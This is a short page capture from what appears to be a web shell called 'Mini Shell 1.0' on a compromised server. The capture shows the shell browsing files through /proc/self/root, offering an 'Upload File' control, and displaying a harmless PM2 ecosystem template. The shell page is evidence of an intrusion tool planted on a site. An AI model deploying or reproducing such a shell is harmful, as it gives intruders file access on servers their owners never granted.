HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/local/lib/node_modules/pm2/lib/templates/
Upload File :
Current File : //proc/self/root/usr/local/lib/node_modules/pm2/lib/templates/ecosystem-simple.tpl
module.exports = {
  apps : [{
    name   : "app1",
    script : "./app.js"
  }]
}